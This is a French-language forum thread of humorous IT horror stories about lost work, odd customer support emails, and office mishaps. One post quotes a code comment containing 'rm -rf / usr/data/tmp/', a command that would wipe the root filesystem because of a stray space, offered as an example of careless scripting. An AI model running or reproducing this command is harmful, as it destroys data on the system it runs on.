Pour retrouver la communauté Thalie 24/24 7/7, une seule adresse: celle qui mène à notre beau serveur Discord.

-> https://forum-thalie.fr/discord <-

Les ordinateurs de l'HORREUR

Topic général, un peu bordélique, parfait pour accueillir toutes choses légères et sans prétention.

Modérateur : La Force Poissons

Avatar du membre
DarkSoul
Membre En Mutation
Messages : 92
Enregistré le : jeu. oct. 13, 2011 2:50 am
Localisation : Japon, Tokyo

Re: Les ordinateurs de l'HORREUR

Message par DarkSoul »

Backstab de /tmp

Un truc dont je viens de me souvenir à mon précédent taf.
Il y avait une équipe de consultants engagés sur un projet à millions, et l'un d'eux vient me voir tout penaud me demandant...
-"Euh... Vous faites les backups des serveurs ?" :kobato:
-"Oui, tous les soirs, pourquoi ?" :coach:
-"Et... Vous faites les backups de /tmp ?" :tamako:
-"... o_o" :sayako:
-"Alors, vous les faites ou pas ? Je suis vraiment dans la merde là..." :azusa2:
-"...Euh... Comment dire, non ? On ne les backuppe pas, c'est... temporaire, ça peut partir à la poubelle tous les soirs o_o" :kanako2:
-"...Merde alors... Mais c'est bizarre, j'ai pu coder toute la semaine dedans et ça a pas disparu" :akane3:
-"Mais... Tu en as perdu pour combien de jours de code ? T'as pas commité ?" :rin3:
-"Ben j'ai perdu un weekend de 30 heures T_T" :non:
-"Mais... Mais pourquoi tu as bossé dans l'équivalent d'un VIDE-ORDURES ?!" :ritsu5:
-"Ben j'avais pas de home, donc j'avais nulle part ailleurs où bosser..." :pourquoi:
-"Mais... MAIS pourquoi tu es pas venu me voir pour régler ça ??" :misaka2:
-"Je... Ben on avait des consignes de pas vous déranger, alors..." :kobato:
-"..." :saki2:
"Bon ben désolé en tout cas je peux rien faire pour toi, on backuppe pas ce qui est prévu pour être effacé :/" :misaka:

Une heure plus tard, son chef de projet vient me voir et me dit :
-"Il est venu te voir pour son code perdu, hein ?" :kiddingme:
-"Ben... Oui, mais c'est VRAIMENT bizarre, le cron qui vide /tmp n'aurait pas du s'activer ce jour-là..." :yukino4:
-"En fait, c'est moi qui ai wipe son répertoire. Pour lui apprendre la vie, à commiter régulièrement et à pas coder n'importe où." :lied:
-"... O_o;" :char2:

Prise de bec entre dev et technical lead.
Avec cette petite plaisanterie, le pauvre s'est fait dégager de la team du projet, le lead en a profité pour dire qu'il était incompétent et pas digne de confiance blablabla. :/
Membre d'Epitanime depuis 2000 (EPITA Promo 2005 SRS)
Informaticien expatrié, traducteur à ses heures perdues

Avatar du membre
Amo
Figure maternelle
Figure maternelle
Messages : 9520
Enregistré le : mar. mai 15, 2007 10:43 pm
Localisation : Labyrinthe Électre
Contact :

Re: Les ordinateurs de l'HORREUR

Message par Amo »

Je comprends RIEN au vocabulaire général du topic parce que c'est pas ma came mais je tiens quand même à admirer l'usage des smileys qui sont ici utilisés à leur potentiel maximal, ce qui fait plaisir.

:melenchon2:

Avatar du membre
DarkSoul
Membre En Mutation
Messages : 92
Enregistré le : jeu. oct. 13, 2011 2:50 am
Localisation : Japon, Tokyo

Re: Les ordinateurs de l'HORREUR

Message par DarkSoul »

Amo a écrit :Je comprends RIEN au vocabulaire général du topic parce que c'est pas ma came mais je tiens quand même à admirer l'usage des smileys qui sont ici utilisés à leur potentiel maximal, ce qui fait plaisir.

:melenchon2:
Je dois dire que le répertoire est de toute première qualité. On en discutait avec Shik, c'est un véritable plaisir à quel point ils sont adaptés aux situations qu'on présente :applause:
Membre d'Epitanime depuis 2000 (EPITA Promo 2005 SRS)
Informaticien expatrié, traducteur à ses heures perdues

Avatar du membre
QCTX
Fait partie du paysage
Messages : 134
Enregistré le : lun. mars 30, 2009 12:44 am
Localisation : RP

Re: Les ordinateurs de l'HORREUR

Message par QCTX »

Dans le temps, j'étais installé sur le toit d'une gare parisienne.
Non, non, pour bosser.
Si, si, j'vous jure.

Un de mes premiers open-space, pour des assurances.
C'est à ce moment là que j'ai découvert toutes les finesse d'un outils inventé par le Diable en personne (Microsoft) pour empoisonner la vie de ses utilisateurs via l'utilisation que souhaiterait en faire des ronds-de-cuirs inconscients. Je parle ici du terrible "proquota.exe" :coach:
Comme toutes les mauvaises idées, celle-ci part d'une bonne intention. En entreprise, quand on a des serveurs, des utilisateurs et que l'on souhaite mettre les uns au service des autres (et non l'inverse) sous Windows, on utilise des "profils itinérants". C'est un concept charmant qui dit que si un utilisateur ouvre une session sur un poste A, créé un fichier, ferme sa session et rouvre une autre session sur le poste B, il doit retrouver son fichier. Ce qui sous-entends que le fichier a été sauvegardé sur un serveur dédié aux profils itinérants. Ca, c'est pour la théorie.
Dans la pratique, ça inclue que selon les utilisateurs, la taille du profil (la quantité de place qu'il va prendre sur le serveur) peut varier énormément. Et que donc, pour éviter tout débordement, on met en place des quotas d'utilisation. Et c'est ici que l'on retrouve notre horrible "proquota.exe", un agent (du diable) qui se charge de synchroniser en permanence le contenu de votre profil avec le serveur. Et qui vous signalera avec véhémence que votre profil est trop gros, et qu'il faut supprimer des fichiers. Surtout si vous êtes un vendredi soir, juste au moment de fermer votre session et que cette saloperie vous interdit de fermer la session tant que vous ne vous êtes pas exécuté.

Bon, bien sûr il y a les petits malins qui conaissent le truc. Lancez votre gestionnaire de programmes, retrouvez "proquota.exe" dans la liste des process, clic-droit et on kill. Bon, par contre, votre profil n'est plus sauvegardé, mais au moins, vous pouvez fermer la session et vous barrer. Et puis il y a les autres...

Le collègue qui a tranquillement coupé son micro, passé son correspondant en main-libres et s'est mis à se rouler par terre de rire nous a un peu surpris. Surtout que le client à l'autre bout du fil semblait plutôt vert de rage, prêt à en appeller à tous les supérieurs hiérarchique du monde. L'explication, que l'on a obtenu plus tard est la suivante.
Le collègue avait été appelé plus tôt pour faire une intervention sur le poste utilisateur qui se plaignait de ralentissements divers. Procédure standard, on nettoie le le poste. Pas au karsher, hein, juste on fait le vide dans certains répertoire temporaires, on vérifie la taille du profil et que tout roule. On caresse aussi le client dans le sens du poil pour qu'il nous lache la grappe et puis c'est marre, ticket fermé.
Sauf que là, il avait eu droit à un winner. Le mec en avait tellement marre de proquota qu'il avait trouvé une combine géniale. Stoker tous ses fichiers important à un endroit que ne sauvegardait pas proquota. En l'occurrence... la Corbeille.
Oui, vous avez bien lu, le mec enregistrait tranquillement tout son travail dans la corbeille Windows. Tout architecturé avec des dossiers et des sous-dossiers depuis plusieurs mois déjà. :jospin:

Évidemment, le collègue a été soutenu par toute la hiérarchie et n'a jamais été blammé pour son opération. Le client, lui, jamais plus entendu parlé.
Image

Avatar du membre
Docteur Nock
Doc de combat
Messages : 1979
Enregistré le : dim. nov. 14, 2010 12:51 pm
Localisation : Enfermé dans sa chambre
Contact :

Re: Les ordinateurs de l'HORREUR

Message par Docteur Nock »

Ces gens qui enregistrent leur fichiers n'importe où...

Le nombre de crises de nerfs auxquelles j'ai pu assister à l'IUT, venant de gens qui venaient subitement de perdre le seul exemplaire de leur rapport super important-à-rendre-la-semaine-suivante, tout ça parce qu'ils ne l'avaient enregistré que sur leur clé USB qui venait de subitement rendre l'âme.
Où alors, leur PC venait de les lâcher et ces champions n'avaient bien sûr aucune sauvegarde (parce que c'est bien connu, quand tu as 6 mois pour faire un rapport qui compte pour 30 % de ta note de l'année, c'est évident que la confiance règne).

Du coup, à l'IUT, toujours, je restais souvent tard le soir, et je fermais souvent les salles informatiques. J'en profitais accessoirement pour éteindre les postes restés ouvert, vandaliser les profils Facebook des gens qui partaient sans fermer leur session et sans faire gaffe que leur profil était toujours ouvert, et ramener les objets oubliés au local de l'association (dont j'étais possesseur d'une des deux clés).
J'ai donc récupéré un bon paquet de clés USB oubliées.

Un jour, après avoir, la veille, ouvert une clé oubliée pour identifier sa propriétaire, je vais pour la rendre. J'entends justement la fille en question dire qu'elle est dans la merde, qu'elle n'a pas d'autre sauvegarde de son rapport que celle qui figure sur la clé...
J'ai justement hésité à un être un gros batard et à garder la clé, pour lui apprendre la vie.

C'est pas comme si on avait un prof qu'on voyait toutes les semaines qui nous répétait sans cesse de ne jamais conserver de fichier uniquement sur une clé.

Avatar du membre
Little Yokai
Angst Addict
Messages : 2218
Enregistré le : mar. sept. 21, 2010 12:22 am
Localisation : Rapture
Contact :

Re: Les ordinateurs de l'HORREUR

Message par Little Yokai »

L'histoire de Darksoul j'ai de la peine pour le mec, bon il refera plus l'erreur mais quand même quoi :kobato:

QCTX, ton histoire est juste magique putain. Le mec il devait se douter que ça lui pendait au nez quand même :inaba:

Avatar du membre
Il Palazzo-sama
~$ source ~/pédant.sh --verbose 2>var/log/émotions &
Messages : 1032
Enregistré le : sam. mars 19, 2011 5:20 pm
Localisation : Entre Lille et l’Ill
Contact :

Re: Les ordinateurs de l'HORREUR

Message par Il Palazzo-sama »

Little Yokai a écrit :Genre par exemple, l'utilisateur que je dois rassurer longtemps que non, les icônes ne disparaitront pas du bureau quand je remplacerait l'écran. Oui oui.
/!\ Attention au lien TVTropes

L’écran est l’ordinateur, non ?
Little Yokai a écrit :celle qui chercher à résoudre TOUS les appels par la mise à jour d'acrobat reader :kanako2:
Comment ça, vous n’utilisez pas Google Ultron ? :ringo3:

(référence: 1 / 2)
DarkSoul a écrit :Avec cette petite plaisanterie, le pauvre s'est fait dégager de la team du projet, le lead en a profité pour dire qu'il était incompétent et pas digne de confiance blablabla. :/
Et après y’en a qui osent se plaindre que trop d’histoires finissent bien. :marii9:

Salut en mémoire de tous les soldats tombés au champ d’honneur avant d’avoir appris à se battre. :snake:
DarkSoul a écrit :

Code : Tout sélectionner

: To erase all temp data, do : rm -rf /tmp/data && rm -rf / usr/data/tmp/
La même affaire aurait eu lieu sur du Solaris ou GNU/whatever à jour, ça aurait juste renvoyé une erreur.

(all hail le --preserve-root par défaut)

Mais c’est mignon, cette rencontre de cargo cult programming et d’un inévitable espace impromptu. :marii3:



L’espace c’est grand. Très grand. Tu ne peux pas t’imaginer à quel point c’est énormément, gigantesquement, stupéfamment grand.
(mini-anecdote)

À l’époque où j’apprenais les bases de Bash, on débuggait à plusieurs un script basique écrit par l’une des têtes de promo : elle, le prof (mon préféré, auquel j’ai eu le déplaisir de devoir annoncer la mort de Satoshi Kon, qui s’est pour le coup retrouvé dans le devoir de fin de semestre), moi. (dont c’était la matière préférée) et deux autres copains (dont un autre des têtes de promo)

Au bout de 15 bonnes minutes (en toute honnêteté, je pense qu’on faisait pas suffisamment attention au contenu du message d’erreur, trop occupés à s’amuser à tenter de débugger juste en lisant le code), on regarde cette ligne:

Code : Tout sélectionner

var= "valeur"
Prof : Euh... y’a pas un espace, là ? :yukino4:
Ce jour est le jour où nous quatre avons appris à faire gaffe de ne pas mettre d’espace dans une déclaration de variable en Bash.

Depuis, à chaque fois qu’elle avait un programme qui ne s’exécute pas, quel que soit le langage, on lui demandait systématiquement : « [Tu es sûre qu’il n’y a pas d’]espace ? » :yamada3:
« La violence est le dernier refuge de l'incompétence. »
Salvor Hardin

Avatar du membre
Keul
Début de la gloire
Messages : 11
Enregistré le : ven. juin 03, 2011 12:51 pm

Re: Les ordinateurs de l'HORREUR

Message par Keul »

Little Yokai a écrit :L'histoire de Darksoul j'ai de la peine pour le mec, bon il refera plus l'erreur mais quand même quoi :kobato:
Heu, bosser dans /tmp, c'est aussi un peu con aussi hein.

Par contre, j'avais eu un truc dans ce style mais en REVERSE:

On passe la matinée a bosser sur un TP. J'ai mes fichiers sur ma clef USB, je les copie sur le bureau et je bosse dessus (parce qu'en USB 1.1 à l'époque, c'était pas génial de bosser direct sur une clef USB) :himari2: :kobato:
L'heure de la récrée de 10h sonne. :fuckyea:
Le prof veux qu'on sorte rapidement de la salle. :vuvuzela:
Il appuie sur le gros bouton rouge. (équivalent de on tire la prise) :boxe: :red:

:rena3:

Retour le ra récré, on démarre les PC. :kirito:


:rena3:
Mon fichier est plus là. :keuwa: :death:
OKay, vu que y'en a qui foutait la merde sur les PC, les admin sys avaient eu l'idée de: à chaque boot, une image du disque est restauré. (un peu comme un liveCD) :kuroko2: :fu: :mad:

Avatar du membre
Jeff Vimes
Un peu trop impliqué
Messages : 1095
Enregistré le : ven. juil. 09, 2010 2:20 pm
Localisation : Perfide Albion

Re: Les ordinateurs de l'HORREUR

Message par Jeff Vimes »

Dans le temps, j'étais installé sur le toit d'une gare parisienne.
Tiens, je ne suis pas le seul a etre passé par le credit agricole a Montparnasse?

Avatar du membre
Fl4v1en
Commence à jouer en mode Normal
Messages : 33
Enregistré le : mar. mai 24, 2011 1:10 pm

Re: Les ordinateurs de l'HORREUR

Message par Fl4v1en »

Bon, j'ai 5 minutes, voici 2011.
J'ai plus envie d'entendre parler de vous, encore une fois votre réponse
c'est du flan et vous êtes des connards finis. le matériel a des défaut
d'assemblage d'usine, et non lié a un quelconque problème de transport, je
sais pas si vous avez des problèmes avec vos putains de cerveau de sous
êtres pour comprendre les choses, mais c'est pas compliqué pourtant putain
de guignols.

bref allez bien tous vous faire foutre bande de sous
merdes, a jamais.
Le type avait accepté une tour avec le carton éclaté.
Bug à
l'installation de Windows 7 (64 bits)
Après ce bug j'ai essayé une version
de Vista et XP et même problème, ca plante à 'installation J'ai remplacé
les RAM et la encore même problème. J'ai remplacé le disque dur et
même
problème. J'ai acheté une deuxième carte mère qui est une ASUS SABERTOOTH
55I et la enfin je n'ai plus eu de problème. La carte mère est donc
défecteuse car j'ai testé tout ce qui est possible. Je suis technicien en
informatique et professeur en hardware et j'ai toujours acheté des cartes
mères ASUS. J'espère que l'on fera quelque chose pour m'aider pour ma carte
mère.
Ces produits n’ont pas été achetés chez vous.
Par contre mon patron de mon entreprise m’a chargé d’effectuer l’installation de ces produits c’est pourquoi je viens vers vous pour les renseignements précédemment demandé.
driver cd no found file ne peut pas le configurer pen suite;pas accés à
ladresse
suivante:

http://www.uc-logic.com/download/download_driver.htm
roulette
souris ne tourne pas; quoi faire.....
Q: Je n'arrive pas à faire fonctionner les pièces ensemble

ne marche pas du tout.

Le Pc marche sans l'onduleur, pas deriere
...

Appuier sur le bouton power, ineficasse.
j(aurais voulu commander 1 imprimante mais aucune possibilité de voir si cet imprimante est compatible
avec mon ordinateur sanyo 552 fourni en 1984 avec 1 seikosha 1000A comme je suis agé le pris est trop élevé
le prix finale est plus chère que le prix ttc.
je souhaiterais me rendre chez vous pour éviter une erreur d'achat.
Alors lui, c'est un fameux. Pas de bol, j'ai perdu certaines des captures de ses courriels. Notez que vous n'avez pas les gifs. :kanie:
Image
bonjour j'ai instaler le logiciel qui et fourni avec et quand je veux me
sairvire de ma webcam il ne se pas rien et pour temp l'ordi reconai la
webcam et le sont du micro fonctionne mai la fenaitre d'utilisation de la
cam ne souvre pas sur l'ecran se qui ment perche l'utilisation de celle si
et si vous pouvier me donner une solution a mont probleme merci
Le type de connecteur d'une alimentation qui va sur la carte mère est
confidentiel et je présume ne doit pas être communiqué ATX12 et P4 ou P8,
cela est du secret. On montre une photo de la boite ou de la face avec le
bouton Arret/Marche mais surtout pas la connection vers la carte-mère,
c'est interdit ! En cherchant des cartes mères pour mettre un CPU Intel
P1155, surprise elles sont toutes en ATX12 et P8, Asus P8H61, P8H67, P8P67,
AsRock P7H55, etc... (exception pour la photo mensongère de ASUS P8H67MEVO
qui montre du P4 alors que le manuel de la carte indique du P8) il n'y
aurait que Gigabyte avec la P67A-UD3 et la PA65-UD3 qui acceptent le P4 et
des cartes PCI genre 1394 et télé...
C'est mieux ainsi et ceux qui veulent
mettre du Sandy Bridge de Intel qui bousille le SATA ne doivent pas être
aidés et tant mieux si ils ne trouvent pas le bon boitier ou la bonne
alimentation. Seul l'alim Akasa Ess +450 dit qu'il y a du P8 car on peut en
faire 2 P4, les traitres.
On est d'accord, moins on en dit...
Cela
dit c'était prévisible, le disque fonctionnait très bien avant de ne
plus fonctionner, donc ce n'est pas un problème de firmware.
Suite à votre dernier mail, je constate qu'il faut que je renvoie cette alimentation défectueuse. Je trouve cela totalement inadmissible!
Oui, je bosse dans la vente par correspondance.
J’aurai un besoin exprimé ci-dessous. Pouvez-vous me dépanner ?

offre de prix et de délai d'approvisionnement pour le matériel suivant :

Fabricant : QUANTUM ProDrive

Désignations : Disque dur SCSI,

Référence : LPS540S 541MB 3.5 SCSI _(MV54so11),

Quantité demandée : 10,
Je parle toujours de 2011.
je ne cherche pas a avoir une reduction pour avoir une reduction je cherche juste a savoir si c'est possible pour ainsi avoir moins de frais de port et faire deplacer moins de transporteur pour preserver la planete et ne pas me reinscrire encore sur un site de vente et faire marcher votre systeme de vente qui me conviens largement
Par contre j'ai clooné mon OS sur un autre disque avec lequel j'ai travaillé plusieurs jours sans rencontrer de soucis, j'ai ensuite re-clooner l'image originale de mon installation sur le disque WD acheté chez vous et là pareil que les deux premiers essais: après quelques démarrages le système devient instable, des erreurs apparaissent et finalement ces dernières deviennent irréparables.
:clooney:
Monsieur,
Je n'assassine personne ni à l'arme blanche ni à l'arme à feu. Je dispose de bien pire ! Que ça, Mes carreaux, mes traits tirés par une arbalète bien plus précise, plus funestes que les armes prétendues meurtrières mises au point par d'ingénieux bricoleurs, certes mais bricoleurs à peine.
Je connais des armes de toutes sortes pour avoir appris à m'en servir et fort bien mais la barbarie n'a pas été inscrite dans mes gènes.
Ma meilleure arme de défense ou d'attaque est l'écrit. Il laisse de bien plus profondes, douloureuses, longues, et éternelles cicatrices.
Je ne vous recommande pas du tout de m'envoyer d'une manière ou d'une autre dans vos parterres d'orties ou de chardons là sous la fenêtre.
Je déteste ça et je passe vite de la courtoisie aux flèches empoisonnée dont j'ai plein les carquois. De cette façon, vous venez d'apprendre que je ne suis pas votre farfelu du jour.
Je vous recommande vivement de lire ceci attentivement et de me donner rondement une réponse satisfaisante, acceptable. si je devais recevoir une réponse me sortant brutalement et sans réponse par une porte, dites vous bien que j'entrerais par une autre issue voire par voie be presse pour mieux me faire entendre.
Je suis loin d'être un petit facétieux, plaisantin, farfelu.
Après cette brève mais raisonnable présentation, venons-en aux faits :
Au mois de mai 2011 j'ai chargé mon fils, consultant en informatique, de me trouver un ordinateur portable de qualité.
C'est sur votre entreprise qu'est dévolu son choix du fournisseur.
J'ai reçu l'ordinateur et suis en train de m'en accommoder mais le mode d'emploi fourni avec la bête me cause quelques soucis.
J'aimerais que vous me fournissiez une version sous word2007 (format .docx) du mode d'emploi de mon ordinateur portable.
Non ! L'américanisme "pc" ne me convient absolument pas
J'ai déjà essayé de vous contacter par votre réseau connectique. Et n'ai essuyé que la traditionnelle, inconvenante, impertinente, discourtoise, imprécise et primitive réponse de l'auteur attardé de l'algorithme habituellement formé et destiné à calmer la curiosité du débile qui a le cran de secouer la bête.
Comme souvent, les gens que je m'estime en droit de supposer malhonnêtes ou tout au moins pas très loyaux dans leurs sabots, les sites de gens comme vous se barricadent derrière des automates qui répondent à tout par n'importe quoi sauf ce que l'on en attend.
Ces crapuleux automates ne sont que des sacs à puces qui voudraient dresser l'être humain à la taille de l'insecte qui eut ses heures de gloire jadis dans les cirques.
Il y eut la fable de la grenouille qui veut se faire plus grosse que le bœuf (JDLF). Je suis certain, aujourd'hui il aurait changé le titre en commençant par la puce.
Remarquez, devant l'engin, il y a toujours un humain qui tire les ficelles et un autre derrière le premier qui tire les premières et avant tout ça, tout des bataillons de petits chefs, plus gros chefs et très gros chefs. Il y a des entreprises très nombreuses où l'embonpoint est un véritable signe de distinction intellectuelle, perspicacité, discernement. À croire que chez certains de ces gros penseurs, le cerveau se situe dans le bedon, la panse (pour l'ironie mais pas trop, je suis assez sérieux).
Remarquez, j'ai toujours constaté que plus on est contraint de s'élever dans les hiérarchies, plus haut on se hisse dans les épaisseurs les plus denses des vides sidéraux sidérants des voutes crâniennes.
Raison logique pour laquelle j'ai toujours refusé que l'on m'élevât trop haut dans les cimes. Seules les compétences sont importantes, les traitements sont dérisoires dès qu'on gagne suffisamment pour vivre heureux. Et le bonheur ne dépend pas du tout de la hauteur exagérée à laquelle on s'est fixé la baguette dès le moment où l'on passe au dessus avec sa famille.
Et vous conviendrez que le plus bas est le plus facile.
Ceci dit, aucun directeur pdg ou autre ponte n'a jamais été autorisé à entrer dans un de mes lieux de travail. Le compètent était lui ou moi. Aucun d'eux n'ayant pu me faire de démonstration convaincante, ils ont TOUS dû se plier à attendre que je veuille bien les recevoir ! Il m'est arrivé d'oublier.
Je ne suis pas humain savant pour puces dresseuses mais j'ai tout de même eu mes heures, que dis-je ? Mes années de gloire dans la mécanographie de l'âge des grosses calculatrices, tabulatrices, fusionneuses trieuses, à tableaux de fiches et lampes. Puis vinrent les dinosaures à tores magnétiques. Des dinosaures grands comme les immeubles que les terroristes auraient semble-t-il fait s'écrouler quelque par dans un pays crapuleux comme les états unis d'amérique du nord où n'importe quel morveux titré juge condamne à mort sans preuve aucune et fait exécuter sans sourciller n'importe qui lui semble avoir la couleur assez foncée pour le confier au shaman qui pique de ses potions vénéneuses.
On attache fermement le martyre à un brancard au cas où qu'il trouve encore la force de filer malgré les saloperies qu'on lui a fait d'abord avaler pour le calmer, le faire taire.
Beau pays chantre et champion de la démocratie qui attire de plus en plus de français et autres européens qui savent de moins en moins lire, comprendre, écrire, parler leur langue au point de préférer baragouiner des onomatopées originaires de la perfide albion mâtinée de celles des yankees.
Je ne lis plus ces grognements que mon chien ne voudrait même pas prononcer par crainte de passer pour une brute idiote.
Vous me faites plaisir et vous me faites parvenir ce que je suis en droit de demander et d'obtenir ou bien dois-je faire appel à des tribunaux ?
Je vous rappelle à toute fin utile que la Loi qui prévaut en Belgique est celle de notre parlement belge et la loi française n'a ici aucune voix au chapitre; n'en déplaise aux français.
Vos avocats ne peuvent entrer dans nos cours que la muselière au bec puisque vous les appelez aussi perroquets.
De toute manière, muselière ou pas, nous avons les pointes de paris pour le leur clouer en cas d'oubli..
D'avance merci de me faire parvenir ce si peu que je vous demande.
Ce mode d'emploi en mode word2007 et votre adresse courriel où vous remercier ou éventuellement vous recontacter je ne dérange jamais personne pour rien, pour mon plaisir ne celui de personne. Lorsque j'écris, c'est parce que j'ai au moins un mot à dire.
Je vous laisse chercher ce qu'il souhaite vraiment :D
Bonjour,
j'aurais besoin, pour un devoir dans le cadre scolaire, de la documentation du circuit
accueillant le BIOS dans la carte mère: k9n6pgm2-v
C'est obligatoire pour effectuer ce devoir.

Merci d'avance.
Aujourd'hui c'est le 4e qui tombe en panne. Je sais que la garantie est dépassée mas y a t'il un recours possible ?
Commande de 2006 pour un courriel reçu en décembre 2011. :P


A plus tard pour 2012.
Désolé.....

Avatar du membre
Smog ShadowSeth
Un peu trop impliqué
Messages : 1072
Enregistré le : dim. nov. 08, 2009 3:05 pm
Localisation : ಠ_ಠ
Contact :

Re: Les ordinateurs de l'HORREUR

Message par Smog ShadowSeth »

DarkSoul a écrit :En parlant des "c'est mon <...>" / "c'est ton <...>" j'en ai deux magnifiques à raconter.

Expériences de virtualisation en cours au boulot pour se débarasser de certains vieux tromblons de serveurs qui sont potentiellement un poids mort et un désastre en puissance.

Entretien avec une disqueuse
Aaah, donc c'est à cause de ça que la maréchaussée locale t'avais retenu quelques heures suite à une plainte de ce monsieur "muh legacy"? J'avais pas fait le rapprochement lorsque t'avais raconté ça sur mumble... :lisbeth:

J'ai un truc dans le même genre, mais en beaucoup moins bourrin et sans le drama politique:

Le serveur et le stylo à bille

Contexte: dans la même boite que mon histoire précédente; après avoir grillé plusieurs sysadmins, la hiérarchie à décidé qu'on s'en passerai en répartissant les tâches qui leur sont dévolues sur les devs. Mon chef s'est retrouvé à gérer l’infrastructure de toute la boite, et bibi s'est tapé le support utilisateur (qu'on appelle Niveau 1 dans le jargon si je ne m'abuse). J'avais accepté, jeune et naïf que j'étais, plutôt avec enthousiasme à l'époque, croyant que ça pourrait m'apporter des compétences supplémentaires, mais cela c'est avéré être l'erreur qui m'aura coûté mon job. :kanako2: Cependant, il s'agit d'une autre histoire qui sera peut-être contée une autre fois. :homura:

Bref. J'arrive un matin à la boite, très en avance comme à mon habitude (genre pas loin d'une heure; je prenais une GROSSE marge pour m'éviter les ennuis réguliers des transports en commun). J'ai à peine le temps de poser mon manteau que mon téléphone sonne.

C'est une personne de la compta elle aussi arrivée en avance, et qui a appelé tout de suite en m'entendant monter à mon bureau. Elle m'informe qu'elle n'arrive pas à se loguer sur sa session, et me demande de jeter un coup d’œil sur le problème.

J'essaie moi aussi de me loguer sur la mienne, pour constater que j'ai le même problème. Il arrivait régulièrement au serveur de sessions de planter (vous avez vu la qualité de l'infra? :sayako: A rêver...), donc je me suis douté que c'était une nouvelle fois un plantage de sa part, et me rend en salle serveur pour aller voir. En temps normal, dans une boite standard, ça ne devrai pas être mes oignons puisque c'était de l'infra, mais il était courant avec mon chef qu'on déborde sur les responsabilités de l'autre lorsque la situation l'exigeait et que nous pouvions matériellement répondre aux demandes: nous étions dans une petite boite avec beaucoup (trop) de taff coté informatique et une hiérarchie qui s'inquiétait plus du résultat immédiat que de la forme pour le long terme.

Donc, en salle serveur me voilà.

Enfin, "salle serveur" était une bien belle expression pour désigner ce qui était tout au plus un grand débarras poussiéreux (mais quand même climatisé...) dans lequel tout le matos informatique inutilisé de la boite se trouvait, avec dans un coin l'armoire des racks. J'avais accès a cette salle parce que c'était là que se trouvaient les pièces de rechange en cas de matériel cassé, mais j'avais du coup aussi un accès physique aux serveurs de la boite vu qu'ils étaient dans la même pièce. :musume:

Ah, et ai-je aussi précisé que la porte de l'armoire n'était même pas verrouillée? Les clefs étaient dessus... :kanie:

Bref. J'ouvre le bousin pour examiner le serveur, qui tient compagnie à d'autre bécanes dont entre autres les serveurs web de mon histoire précédente. Il y a un écran de monitoring relié à un switch VGA lui-même branché sur les différentes bécanes, ainsi qu'un combo clavier/souris lui aussi branché sur switch. Je bascule le tout sur le serveur de session pour constater qu'il y a un bel écran noir et qu'il ne répond plus alors qu'il est encore sous tension . Un hard reboot s'impose donc. :hajime3:

Problème: si l'armoire à rack n'était pas verrouillée, ce n'était pas le cas des racks eux-même qui étaient individuellement enfermés derrière une grille; grilles qui était fermées par un verrou chacune. J'avais bien une petite idée d'où se trouvaient les clés, mais l'endroit en question n'était accessible qu'a l'aide d'une clef que seul mon chef avait; et comme j'étais seul pour le moment...

Je me résigne donc à attendre l'arrivée de celui-ci lorsqu'un vieux stylo à bille qui traînait là me donne une idée. Le bouton power de la bécane était visible à travers la grille, si j'arrivai à y faire passer à travers quelque chose d'assez rigide...
Mais là, le stylo est bien trop gros pour passer dans les trous de la grille. Cependant... Je ne suis pas obligé d'utiliser tout le stylo pour que mon plan fonctionne, non?

Je retire donc la pointe du stylo soudée à la cartouche, qui elle est suffisamment fine pour passer. Et elle se trouve être juste assez rigide pour pouvoir enfoncer le bouton. :mio2:

La bécane redémarre dans une volée de ventilateurs à plein régime, et une petite minute plus tard je peux à nouveau me loguer sur ma session et rappelle la personne de la compta. :mio2:

Le plus drôle étant que mon chef n'a même pas tiqué lorsque je l'ai informé de mon action... Et il ne s'est jamais demandé comment j'avais pu faire alors qu'il prenait systématiquement les clés des grilles lorsqu'il devait intervenir sur les serveurs. :dolan:

Inutile de vous dire que je ne me suis pas gêné pour réutiliser cette méthode lorsque cela était nécessaire...

tl;dr: j'ai contourné une protection physique de serveur à l'aide d'une fourniture de bureau présente en abondance dans n'importe quelle entreprise. :himari2:

Smog.
Image

Avatar du membre
DarkSoul
Membre En Mutation
Messages : 92
Enregistré le : jeu. oct. 13, 2011 2:50 am
Localisation : Japon, Tokyo

Re: Les ordinateurs de l'HORREUR

Message par DarkSoul »

Smog ShadowSeth a écrit :Aaah, donc c'est à cause de ça que la maréchaussée locale t'avais retenu quelques heures suite à une plainte de ce monsieur "muh legacy"? J'avais pas fait le rapprochement lorsque t'avais raconté ça sur mumble... :lisbeth:
Non non, le monsieur qui m'a fait "mais, c'est MON rack !" il m'a pas fait de soucis du genre, il a été très butthurt mais il m'a pas fait d'autre crasse.
Non, si j'ai fini quelques heures au poste pour une plainte pour "coups et blessures", c'est à cause d'un crétin de consultant japonais.
(J'ai eu aussi deux trois fois à témoigner, notamment pour l'affaire "Rise of the machines (not.)" puisque j'avais été aux premières loges pour découvrir la merde)

Consultant / Roi des Cons / Wesh t'as pas une clé USB là vite fait ?

C'est en fait une suite au projet de monsieur "je bosse dans /tmp".
Le patron de la boîte de consultants qui était sur place (très, TRES gros contrat ; et notre CTO était actionnaire de la boîte de consulting en question... :yukino4: )
Et il y avait beaucoup de disputes autour de qui serait le porpriétaire du bébé.

Et là, donc, le monsieur vient me voir.
-"Dis, je te file une clé USB vite fait là, tu peux me faire un checkout de tout le projet ?" :supertwisted:
-"Euh... T'as une autorisation écrite de la direction ? Je sais que le contrat de licence, et les négos pour décider qui est le proprio pour ce truc sont pas faits." :yukino4:
-"Oh allez quoi, t'es pas cool, je croyais qu'on était potes, allez quoi !" :beatrice3:
-"C'est pas la question, si j'ai pas un papier écrit de la main du CTO, je le ferai pas, un point c'est tout !" :serious:
-"OUAIS ALORS TA GUEULE DE TOUTE FACON TA DIRECTION C'EST MOI QUI LUI DIT QUOI FAIRE ALORS TU VAS FAIRE CE QU'ON TE DIT SINON-" :fu: :ringo3: hurle-t-il en m'empoignant par le col de ma chemise. En faisant une tête de moins que moi. Dans l'openspace. Où cinquante personnes viennent de se retourner.
-"...sinon quoi ?" :shouko: dis-je très calmement en prenant ses mains et en les retirant de mon col.
°oO("Mais oui mec vas-y donne-moi une raison de passer en légitime défense, vas-y. Tu réalises que je fais une tête de plus que toi et du fitness ?" :fuckthat: )

Le mec se fait escorter très "gentiment" par notre sécurité avec interdiction de revenir sur les lieux tant qu'il ne s'excusera pas à genoux devant tout le monde. Sisi, je suis sérieux. Le CTO ricain lui a demandé un putain de dogeza.

Une semaine plus tard... Je suis convoqué à la police, depuis le taf, pour une histoire de coups et blessures. :pokerface:
